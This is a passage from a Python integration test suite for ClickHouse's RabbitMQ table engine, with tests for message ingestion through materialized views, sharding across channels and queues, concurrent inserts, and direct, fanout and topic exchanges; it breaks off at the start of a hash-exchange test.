        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'mvsq',
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM (SELECT * FROM test.rabbitmq);
        ''')
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    for message in messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='mvsq', body=message)
    while True:
        result = instance.query('SELECT * FROM test.view')
        if rabbitmq_check_result(result):
            break
    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
        ''')
    # Cleaned up: removed the stray trailing semicolon after close().
    connection.close()
    rabbitmq_check_result(result, True)
@pytest.mark.skip(reason="Flaky")
@pytest.mark.timeout(180)
def test_rabbitmq_many_materialized_views(rabbitmq_cluster):
    """Two materialized views over the same RabbitMQ table must each receive
    every message."""
    instance.query('''
        DROP TABLE IF EXISTS test.view1;
        DROP TABLE IF EXISTS test.view2;
        DROP TABLE IF EXISTS test.consumer1;
        DROP TABLE IF EXISTS test.consumer2;
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'mmv',
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        CREATE TABLE test.view1 (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE TABLE test.view2 (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
            SELECT * FROM test.rabbitmq;
        CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
            SELECT * FROM test.rabbitmq;
        ''')
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    for message in messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='mmv', body=message)
    while True:
        result1 = instance.query('SELECT * FROM test.view1')
        result2 = instance.query('SELECT * FROM test.view2')
        if rabbitmq_check_result(result1) and rabbitmq_check_result(result2):
            break
    # BUG FIX: the connection was never closed (resource leak); every sibling
    # test closes its connection once publishing is done.
    connection.close()
    instance.query('''
        DROP TABLE test.consumer1;
        DROP TABLE test.consumer2;
        DROP TABLE test.view1;
        DROP TABLE test.view2;
        ''')
    rabbitmq_check_result(result1, True)
    rabbitmq_check_result(result2, True)
@pytest.mark.timeout(240)
def test_rabbitmq_big_message(rabbitmq_cluster):
    """Ingest 1000 large multi-row message bodies and verify no rows are lost."""
    # Create batches of messages of size ~100Kb
    rabbitmq_messages = 1000
    batch_messages = 1000
    messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(rabbitmq_messages)]
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.rabbitmq (key UInt64, value String)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'big',
                     rabbitmq_format = 'JSONEachRow';
        CREATE TABLE test.view (key UInt64, value String)
            ENGINE = MergeTree
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.rabbitmq;
        ''')
    for message in messages:
        channel.basic_publish(exchange='clickhouse-exchange', routing_key='big', body=message)
    # Each message body expands to batch_messages rows, hence the product below.
    while True:
        result = instance.query('SELECT count() FROM test.view')
        print("Result", result, "Expected", batch_messages * rabbitmq_messages)
        if int(result) == batch_messages * rabbitmq_messages:
            break
    connection.close()
    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
        ''')
    assert int(result) == rabbitmq_messages*batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_sharding_between_channels_publish(rabbitmq_cluster):
    """20 producer threads publish 10k messages each; with 5 consumers the
    engine must not lose any of the 200k rows."""
    NUM_CHANNELS = 5
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_num_consumers = 5,
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.rabbitmq;
        ''')
    time.sleep(1)
    # Single-element list used as a shared mutable counter across threads.
    # NOTE(review): increments of i[0] are not lock-protected — keys may
    # duplicate under contention; only the total row count is asserted.
    i = [0]
    messages_num = 10000
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    def produce():
        # Each thread opens its own connection and publishes one batch.
        connection = pika.BlockingConnection(parameters)
        channel = connection.channel()
        channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
        messages = []
        for _ in range(messages_num):
            messages.append(json.dumps({'key': i[0], 'value': i[0]}))
            i[0] += 1
        key = str(randrange(1, NUM_CHANNELS))
        for message in messages:
            channel.basic_publish(exchange='clickhouse-exchange', routing_key=key, body=message)
        connection.close()
    threads = []
    threads_num = 20
    for _ in range(threads_num):
        threads.append(threading.Thread(target=produce))
    for thread in threads:
        time.sleep(random.uniform(0, 1))
        thread.start()
    while True:
        result = instance.query('SELECT count() FROM test.view')
        time.sleep(1)
        print("Result", result, "Expected", messages_num * threads_num)
        if int(result) == messages_num * threads_num:
            break
    for thread in threads:
        thread.join()
    assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_sharding_between_queues_publish(rabbitmq_cluster):
    """Same load as the channels test, but sharded across 4 queues."""
    NUM_QUEUES = 4
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_num_queues = 4,
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.rabbitmq;
        ''')
    time.sleep(1)
    # Shared mutable counter across producer threads (see channels test).
    i = [0]
    messages_num = 10000
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    def produce():
        connection = pika.BlockingConnection(parameters)
        channel = connection.channel()
        channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
        messages = []
        for _ in range(messages_num):
            messages.append(json.dumps({'key': i[0], 'value': i[0]}))
            i[0] += 1
        key = str(randrange(1, NUM_QUEUES))
        for message in messages:
            channel.basic_publish(exchange='clickhouse-exchange', routing_key=key, body=message)
        connection.close()
    threads = []
    threads_num = 20
    for _ in range(threads_num):
        threads.append(threading.Thread(target=produce))
    for thread in threads:
        time.sleep(random.uniform(0, 1))
        thread.start()
    while True:
        result = instance.query('SELECT count() FROM test.view')
        time.sleep(1)
        if int(result) == messages_num * threads_num:
            break
    for thread in threads:
        thread.join()
    assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_sharding_between_channels_and_queues_publish(rabbitmq_cluster):
    """Sharding across both consumers (10) and queues (2) must not lose rows."""
    NUM_CONSUMERS = 10
    NUM_QUEUES = 2
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_num_queues = 2,
                     rabbitmq_num_consumers = 10,
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree
            ORDER BY key
            SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.rabbitmq;
        ''')
    time.sleep(1)
    # Shared mutable counter across producer threads (see channels test).
    i = [0]
    messages_num = 10000
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    def produce():
        connection = pika.BlockingConnection(parameters)
        channel = connection.channel()
        channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
        messages = []
        for _ in range(messages_num):
            messages.append(json.dumps({'key': i[0], 'value': i[0]}))
            i[0] += 1
        key = str(randrange(1, NUM_QUEUES * NUM_CONSUMERS))
        for message in messages:
            channel.basic_publish(exchange='clickhouse-exchange', routing_key=key, body=message)
        connection.close()
    threads = []
    threads_num = 20
    for _ in range(threads_num):
        threads.append(threading.Thread(target=produce))
    for thread in threads:
        time.sleep(random.uniform(0, 1))
        thread.start()
    while True:
        result = instance.query('SELECT count() FROM test.view')
        time.sleep(1)
        if int(result) == messages_num * threads_num:
            break
    for thread in threads:
        thread.join()
    assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_read_only_combo(rabbitmq_cluster):
    """Five materialized views over one RabbitMQ table must each collect every
    row published by 20 producer threads."""
    NUM_MV = 5  # stray C-style semicolon removed
    NUM_CONSUMERS = 4
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_num_consumers = 4,
                     rabbitmq_format = 'JSONEachRow',
                     rabbitmq_row_delimiter = '\\n';
        ''')
    for mv_id in range(NUM_MV):
        table_name = 'view{}'.format(mv_id)
        print("Setting up {}".format(table_name))
        instance.query('''
            DROP TABLE IF EXISTS test.{0};
            DROP TABLE IF EXISTS test.{0}_mv;
            CREATE TABLE test.{0} (key UInt64, value UInt64)
                ENGINE = MergeTree()
                ORDER BY key;
            CREATE MATERIALIZED VIEW test.{0}_mv TO test.{0} AS
                SELECT * FROM test.rabbitmq;
            '''.format(table_name))
    time.sleep(2)
    # Shared mutable counter across producer threads (unsynchronized; only the
    # total row count is asserted).
    i = [0]
    messages_num = 10000
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    def produce():
        connection = pika.BlockingConnection(parameters)
        channel = connection.channel()
        channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
        messages = []
        for _ in range(messages_num):
            messages.append(json.dumps({'key': i[0], 'value': i[0]}))
            i[0] += 1
        key = str(randrange(1, NUM_CONSUMERS))
        for message in messages:
            channel.basic_publish(exchange='clickhouse-exchange', routing_key=key, body=message)
        connection.close()
    threads = []
    threads_num = 20
    for _ in range(threads_num):
        threads.append(threading.Thread(target=produce))
    for thread in threads:
        time.sleep(random.uniform(0, 1))
        thread.start()
    while True:
        result = 0
        for view in range(NUM_MV):
            result += int(instance.query('SELECT count() FROM test.view{0}'.format(view)))
        if int(result) == messages_num * threads_num * NUM_MV:
            break
        time.sleep(1)
    for thread in threads:
        thread.join()
    for mv_id in range(NUM_MV):
        table_name = 'view{}'.format(mv_id)
        # BUG FIX: also drop the materialized view, which the original teardown
        # leaked (only the target table was dropped).
        instance.query('''
            DROP TABLE IF EXISTS test.{0}_mv;
            DROP TABLE IF EXISTS test.{0};
            '''.format(table_name))
    assert int(result) == messages_num * threads_num * NUM_MV, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(240)
def test_rabbitmq_insert(rabbitmq_cluster):
    """INSERT into a RabbitMQ table must publish rows that an external
    consumer can read back."""
    instance.query('''
        CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_exchange_name = 'insert',
                     rabbitmq_routing_key_list = 'insert1',
                     rabbitmq_format = 'TSV',
                     rabbitmq_row_delimiter = '\\n';
        ''')
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    consumer_connection = pika.BlockingConnection(parameters)
    consumer = consumer_connection.channel()
    consumer.exchange_declare(exchange='insert_rabbitmq_direct', exchange_type='direct')
    result = consumer.queue_declare(queue='')
    queue_name = result.method.queue
    consumer.queue_bind(exchange='insert_rabbitmq_direct', queue=queue_name, routing_key='insert1')
    values = []
    for i in range(50):
        values.append("({i}, {i})".format(i=i))
    values = ','.join(values)
    # Retry only on client-side timeouts; anything else is a real failure.
    while True:
        try:
            instance.query("INSERT INTO test.rabbitmq VALUES {}".format(values))
            break
        except QueryRuntimeException as e:
            if 'Local: Timed out.' in str(e):
                continue
            else:
                raise
    insert_messages = []
    def onReceived(channel, method, properties, body):
        # Collect bodies until all 50 rows arrived, then stop consuming.
        # (Removed a dead `i = 0` local and C-style condition parens.)
        insert_messages.append(body.decode())
        if len(insert_messages) == 50:
            channel.stop_consuming()
    consumer.basic_qos(prefetch_count=50)
    consumer.basic_consume(onReceived, queue_name)
    consumer.start_consuming()
    consumer_connection.close()
    result = '\n'.join(insert_messages)
    rabbitmq_check_result(result, True)
@pytest.mark.timeout(240)
def test_rabbitmq_many_inserts(rabbitmq_cluster):
    """20 threads each INSERT 1000 rows; the MV target must end up with all
    20000 rows."""
    instance.query('''
        DROP TABLE IF EXISTS test.rabbitmq_many;
        DROP TABLE IF EXISTS test.view_many;
        DROP TABLE IF EXISTS test.consumer_many;
        CREATE TABLE test.rabbitmq_many (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_routing_key_list = 'insert2',
                     rabbitmq_format = 'TSV',
                     rabbitmq_row_delimiter = '\\n';
        CREATE TABLE test.view_many (key UInt64, value UInt64)
            ENGINE = MergeTree
            ORDER BY key
            SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
        CREATE MATERIALIZED VIEW test.consumer_many TO test.view_many AS
            SELECT * FROM test.rabbitmq_many;
        ''')
    messages_num = 1000
    def insert():
        # One multi-row INSERT per thread, retried on client-side timeouts.
        values = []
        for i in range(messages_num):
            values.append("({i}, {i})".format(i=i))
        values = ','.join(values)
        while True:
            try:
                instance.query("INSERT INTO test.rabbitmq_many VALUES {}".format(values))
                break
            except QueryRuntimeException as e:
                if 'Local: Timed out.' in str(e):
                    continue
                else:
                    raise
    threads = []
    threads_num = 20
    for _ in range(threads_num):
        threads.append(threading.Thread(target=insert))
    for thread in threads:
        time.sleep(random.uniform(0, 1))
        thread.start()
    while True:
        result = instance.query('SELECT count() FROM test.view_many')
        time.sleep(1)
        if int(result) == messages_num * threads_num:
            break
    instance.query('''
        DROP TABLE IF EXISTS test.rabbitmq_many;
        DROP TABLE IF EXISTS test.consumer_many;
        DROP TABLE IF EXISTS test.view_many;
        ''')
    for thread in threads:
        thread.join()
    assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(240)
def test_rabbitmq_sharding_between_channels_and_queues_insert(rabbitmq_cluster):
    """Concurrent INSERTs must survive sharding across 5 consumers x 2 queues."""
    # BUG FIX: also drop test.rabbitmq_sharding up front (as the sibling
    # many_inserts test does), so a leftover table from an aborted prior run
    # cannot make CREATE TABLE fail.
    instance.query('''
        DROP TABLE IF EXISTS test.rabbitmq_sharding;
        DROP TABLE IF EXISTS test.view_sharding;
        DROP TABLE IF EXISTS test.consumer_sharding;
        CREATE TABLE test.rabbitmq_sharding (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_num_consumers = 5,
                     rabbitmq_num_queues = 2,
                     rabbitmq_format = 'TSV',
                     rabbitmq_row_delimiter = '\\n';
        CREATE TABLE test.view_sharding (key UInt64, value UInt64)
            ENGINE = MergeTree
            ORDER BY key
            SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
        CREATE MATERIALIZED VIEW test.consumer_sharding TO test.view_sharding AS
            SELECT * FROM test.rabbitmq_sharding;
        ''')
    messages_num = 10000
    def insert():
        # One multi-row INSERT per thread, retried on client-side timeouts.
        values = []
        for i in range(messages_num):
            values.append("({i}, {i})".format(i=i))
        values = ','.join(values)
        while True:
            try:
                instance.query("INSERT INTO test.rabbitmq_sharding VALUES {}".format(values))
                break
            except QueryRuntimeException as e:
                if 'Local: Timed out.' in str(e):
                    continue
                else:
                    raise
    threads = []
    threads_num = 20
    for _ in range(threads_num):
        threads.append(threading.Thread(target=insert))
    for thread in threads:
        time.sleep(random.uniform(0, 1))
        thread.start()
    while True:
        result = instance.query('SELECT count() FROM test.view_sharding')
        time.sleep(1)
        if int(result) == messages_num * threads_num:
            break
    instance.query('''
        DROP TABLE IF EXISTS test.rabbitmq_sharding;
        DROP TABLE IF EXISTS test.consumer_sharding;
        DROP TABLE IF EXISTS test.view_sharding;
        ''')
    for thread in threads:
        thread.join()
    assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_overloaded_insert(rabbitmq_cluster):
    """Stress test: 5 threads each INSERT 100k rows; nothing may be lost."""
    # NOTE(review): unlike test_rabbitmq_many_inserts, the setup here does not
    # DROP test.rabbitmq_overload first — a leftover table from an aborted
    # prior run would break CREATE TABLE; confirm and align with siblings.
    instance.query('''
        DROP TABLE IF EXISTS test.view_overload;
        DROP TABLE IF EXISTS test.consumer_overload;
        CREATE TABLE test.rabbitmq_overload (key UInt64, value UInt64)
            ENGINE = RabbitMQ
            SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                     rabbitmq_num_consumers = 10,
                     rabbitmq_format = 'TSV',
                     rabbitmq_row_delimiter = '\\n';
        CREATE TABLE test.view_overload (key UInt64, value UInt64)
            ENGINE = MergeTree
            ORDER BY key
            SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
        CREATE MATERIALIZED VIEW test.consumer_overload TO test.view_overload AS
            SELECT * FROM test.rabbitmq_overload;
        ''')
    messages_num = 100000
    def insert():
        # One huge multi-row INSERT per thread, retried on client timeouts.
        values = []
        for i in range(messages_num):
            values.append("({i}, {i})".format(i=i))
        values = ','.join(values)
        while True:
            try:
                instance.query("INSERT INTO test.rabbitmq_overload VALUES {}".format(values))
                break
            except QueryRuntimeException as e:
                if 'Local: Timed out.' in str(e):
                    continue
                else:
                    raise
    threads = []
    threads_num = 5
    for _ in range(threads_num):
        threads.append(threading.Thread(target=insert))
    for thread in threads:
        time.sleep(random.uniform(0, 1))
        thread.start()
    while True:
        result = instance.query('SELECT count() FROM test.view_overload')
        time.sleep(1)
        print("Result", int(result), "Expected", messages_num * threads_num)
        if int(result) == messages_num * threads_num:
            break
    instance.query('''
        DROP TABLE IF EXISTS test.rabbitmq_overload;
        DROP TABLE IF EXISTS test.consumer_overload;
        DROP TABLE IF EXISTS test.view_overload;
        ''')
    for thread in threads:
        thread.join()
    assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_direct_exchange(rabbitmq_cluster):
    """With a direct exchange, each of 5 tables bound to its own routing key
    must receive exactly its own batch of messages."""
    instance.query('''
        DROP TABLE IF EXISTS test.destination;
        CREATE TABLE test.destination(key UInt64, value UInt64,
            _consumed_by LowCardinality(String))
            ENGINE = MergeTree()
            ORDER BY key
            SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
        ''')
    num_tables = 5
    # One RabbitMQ table + MV per routing key 'direct_<N>', all feeding
    # test.destination tagged with _consumed_by.
    for consumer_id in range(num_tables):
        print("Setting up table {}".format(consumer_id))
        instance.query('''
            DROP TABLE IF EXISTS test.direct_exchange_{0};
            DROP TABLE IF EXISTS test.direct_exchange_{0}_mv;
            CREATE TABLE test.direct_exchange_{0} (key UInt64, value UInt64)
                ENGINE = RabbitMQ
                SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                         rabbitmq_num_consumers = 5,
                         rabbitmq_exchange_name = 'direct_exchange_testing',
                         rabbitmq_exchange_type = 'direct',
                         rabbitmq_routing_key_list = 'direct_{0}',
                         rabbitmq_format = 'JSONEachRow',
                         rabbitmq_row_delimiter = '\\n';
            CREATE MATERIALIZED VIEW test.direct_exchange_{0}_mv TO test.destination AS
                SELECT key, value, '{0}' as _consumed_by FROM test.direct_exchange_{0};
            '''.format(consumer_id))
    i = [0]
    messages_num = 1000
    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    channel.exchange_declare(exchange='direct_exchange_testing', exchange_type='direct')
    messages = []
    for _ in range(messages_num):
        messages.append(json.dumps({'key': i[0], 'value': i[0]}))
        i[0] += 1
    # Publish the same batch once per routing key so every table gets a copy.
    key_num = 0
    for num in range(num_tables):
        key = "direct_" + str(key_num)
        key_num += 1
        for message in messages:
            mes_id = str(randrange(10))
            channel.basic_publish(
                exchange='direct_exchange_testing', routing_key=key,
                properties=pika.BasicProperties(message_id=mes_id), body=message)
    connection.close()
    while True:
        result = instance.query('SELECT count() FROM test.destination')
        time.sleep(1)
        if int(result) == messages_num * num_tables:
            break
    for consumer_id in range(num_tables):
        instance.query('''
            DROP TABLE IF EXISTS test.direct_exchange_{0};
            DROP TABLE IF EXISTS test.direct_exchange_{0}_mv;
            '''.format(consumer_id))
    instance.query('''
        DROP TABLE IF EXISTS test.destination;
        ''')
    assert int(result) == messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_fanout_exchange(rabbitmq_cluster):
    """Every table bound to a fanout exchange must receive every message.

    Five RabbitMQ-engine tables attach to the same fanout exchange; one batch
    of ``messages_num`` messages is published, so ``test.destination`` must
    end up with ``messages_num * num_tables`` rows.
    """
    instance.query('''
        DROP TABLE IF EXISTS test.destination;
        CREATE TABLE test.destination(key UInt64, value UInt64,
            _consumed_by LowCardinality(String))
        ENGINE = MergeTree()
        ORDER BY key;
    ''')

    num_tables = 5
    for consumer_id in range(num_tables):
        print("Setting up table {}".format(consumer_id))
        # For a fanout exchange the routing key is ignored by the broker;
        # a per-table key is still set so the table definitions differ.
        instance.query('''
            DROP TABLE IF EXISTS test.fanout_exchange_{0};
            DROP TABLE IF EXISTS test.fanout_exchange_{0}_mv;
            CREATE TABLE test.fanout_exchange_{0} (key UInt64, value UInt64)
                ENGINE = RabbitMQ
                SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                         rabbitmq_num_consumers = 5,
                         rabbitmq_routing_key_list = 'key_{0}',
                         rabbitmq_exchange_name = 'fanout_exchange_testing',
                         rabbitmq_exchange_type = 'fanout',
                         rabbitmq_format = 'JSONEachRow',
                         rabbitmq_row_delimiter = '\\n';
            CREATE MATERIALIZED VIEW test.fanout_exchange_{0}_mv TO test.destination AS
                SELECT key, value, '{0}' as _consumed_by FROM test.fanout_exchange_{0};
        '''.format(consumer_id))

    messages_num = 1000

    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    channel.exchange_declare(exchange='fanout_exchange_testing', exchange_type='fanout')

    # Single-threaded publisher: a plain comprehension replaces the original
    # mutable-cell counter (i = [0]); the unused key_num local is dropped.
    messages = [json.dumps({'key': i, 'value': i}) for i in range(messages_num)]

    for message in messages:
        # Random message_id populates per-message metadata on the broker side.
        mes_id = str(randrange(10))
        channel.basic_publish(
            exchange='fanout_exchange_testing', routing_key='',
            properties=pika.BasicProperties(message_id=mes_id), body=message)

    connection.close()

    # Poll until every table has consumed every message; the @timeout
    # decorator bounds this loop if messages are lost.
    while True:
        result = instance.query('SELECT count() FROM test.destination')
        time.sleep(1)
        if int(result) == messages_num * num_tables:
            break

    for consumer_id in range(num_tables):
        instance.query('''
            DROP TABLE IF EXISTS test.fanout_exchange_{0};
            DROP TABLE IF EXISTS test.fanout_exchange_{0}_mv;
        '''.format(consumer_id))

    instance.query('''
        DROP TABLE IF EXISTS test.destination;
    ''')

    assert int(result) == messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_topic_exchange(rabbitmq_cluster):
    # Topic-exchange routing: the first five tables each bind with the
    # pattern '*.<id>' (matching only their own 'topic.<id>' key); the next
    # five all bind with '*.logs' (all matching 'random.logs').  One batch of
    # messages_num messages goes to each 'topic.<id>' key and one batch to
    # 'random.logs', so the destination table must end up with
    # messages_num * num_tables + messages_num * num_tables rows.
    instance.query('''
        DROP TABLE IF EXISTS test.destination;
        CREATE TABLE test.destination(key UInt64, value UInt64,
            _consumed_by LowCardinality(String))
        ENGINE = MergeTree()
        ORDER BY key;
    ''')

    num_tables = 5
    for consumer_id in range(num_tables):
        print("Setting up table {}".format(consumer_id))
        instance.query('''
            DROP TABLE IF EXISTS test.topic_exchange_{0};
            DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
            CREATE TABLE test.topic_exchange_{0} (key UInt64, value UInt64)
                ENGINE = RabbitMQ
                SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                         rabbitmq_num_consumers = 5,
                         rabbitmq_exchange_name = 'topic_exchange_testing',
                         rabbitmq_exchange_type = 'topic',
                         rabbitmq_routing_key_list = '*.{0}',
                         rabbitmq_format = 'JSONEachRow',
                         rabbitmq_row_delimiter = '\\n';
            CREATE MATERIALIZED VIEW test.topic_exchange_{0}_mv TO test.destination AS
                SELECT key, value, '{0}' as _consumed_by FROM test.topic_exchange_{0};
        '''.format(consumer_id))

    # Second group: all five tables share the '*.logs' binding (note the
    # different rabbitmq_num_consumers = 4, exercising a different consumer
    # count on the same exchange).
    for consumer_id in range(num_tables):
        print("Setting up table {}".format(num_tables + consumer_id))
        instance.query('''
            DROP TABLE IF EXISTS test.topic_exchange_{0};
            DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
            CREATE TABLE test.topic_exchange_{0} (key UInt64, value UInt64)
                ENGINE = RabbitMQ
                SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
                         rabbitmq_num_consumers = 4,
                         rabbitmq_exchange_name = 'topic_exchange_testing',
                         rabbitmq_exchange_type = 'topic',
                         rabbitmq_routing_key_list = '*.logs',
                         rabbitmq_format = 'JSONEachRow',
                         rabbitmq_row_delimiter = '\\n';
            CREATE MATERIALIZED VIEW test.topic_exchange_{0}_mv TO test.destination AS
                SELECT key, value, '{0}' as _consumed_by FROM test.topic_exchange_{0};
        '''.format(num_tables + consumer_id))

    i = [0]  # single-element list: counter shared with the message builder below
    messages_num = 1000

    credentials = pika.PlainCredentials('root', 'clickhouse')
    parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
    connection = pika.BlockingConnection(parameters)
    channel = connection.channel()
    channel.exchange_declare(exchange='topic_exchange_testing', exchange_type='topic')

    messages = []
    for _ in range(messages_num):
        messages.append(json.dumps({'key': i[0], 'value': i[0]}))
        i[0] += 1

    # Publish the same batch once per per-table key 'topic.0' .. 'topic.4'.
    key_num = 0
    for num in range(num_tables):
        key = "topic." + str(key_num)
        key_num += 1
        for message in messages:
            channel.basic_publish(exchange='topic_exchange_testing', routing_key=key, body=message)

    # And once under 'random.logs', which every '*.logs' table receives.
    key = "random.logs"
    for message in messages:
        mes_id = str(randrange(10))
        channel.basic_publish(
            exchange='topic_exchange_testing', routing_key=key,
            properties=pika.BasicProperties(message_id=mes_id), body=message)

    connection.close()

    # Poll until all expected rows arrive; bounded by the @timeout decorator.
    while True:
        result = instance.query('SELECT count() FROM test.destination')
        time.sleep(1)
        if int(result) == messages_num * num_tables + messages_num * num_tables:
            break

    for consumer_id in range(num_tables * 2):
        instance.query('''
            DROP TABLE IF EXISTS test.topic_exchange_{0};
            DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
        '''.format(consumer_id))

    instance.query('''
        DROP TABLE IF EXISTS test.destination;
    ''')

    assert int(result) == messages_num * num_tables + messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_hash_exchange(rabbitmq_cluster):
    # Consistent-hash exchange test: four tables consume from a
